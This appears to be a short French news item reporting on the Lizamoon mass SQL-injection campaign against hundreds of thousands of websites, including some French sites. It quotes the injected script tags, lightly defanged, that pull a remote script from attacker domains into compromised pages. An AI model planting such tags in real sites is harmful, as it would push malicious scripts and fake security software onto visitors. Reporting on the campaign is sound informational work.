Opération Lizamoon

Une nouvelle attaque massive, baptisée Lizamoon, vient de mettre à mal plus de 270 000 sites Internet.

Les pirates injectent un code malveillant dans le code source des sites dont ils détectent une faille SQL. L’injection installe alors dans les pages du site le code suivant :

< script src = hxxp: / / lizamoon.com / ur.php > </ script> ou encore < script src = hxxp: / / books-loader .info / ur.php > </ script> ; < script src = hxxp: / / milapop .com / ur.php > </ script>.

 

Des liens iTunes ont également été compromis, mais Websens souligne « Heureusement, iTunes encode les balises de script, ce qui signifie que le script malveillant ne s’exécute pas sur l’ordinateur de l’utilisateur ».

En France, plusieurs dizaines de sites ont été piégés de la sorte, dont l’Astronomy Club de France et la boutique de Brigitte Lahaie. De fausses adresses cachées dans les iFrames ouvrent des publicités renvoyant sur de faux logiciels de sécurité informatique.

Partager : Facebook Twitter Plusone

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *


*